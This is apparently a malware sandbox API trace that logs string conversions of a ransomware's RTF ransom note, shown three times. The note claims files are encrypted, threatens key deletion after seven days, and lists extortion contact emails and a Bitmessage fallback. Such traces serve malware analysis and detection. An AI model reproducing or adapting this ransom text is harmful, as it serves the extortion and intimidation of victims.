which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0207.818] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0207.818] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a558, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 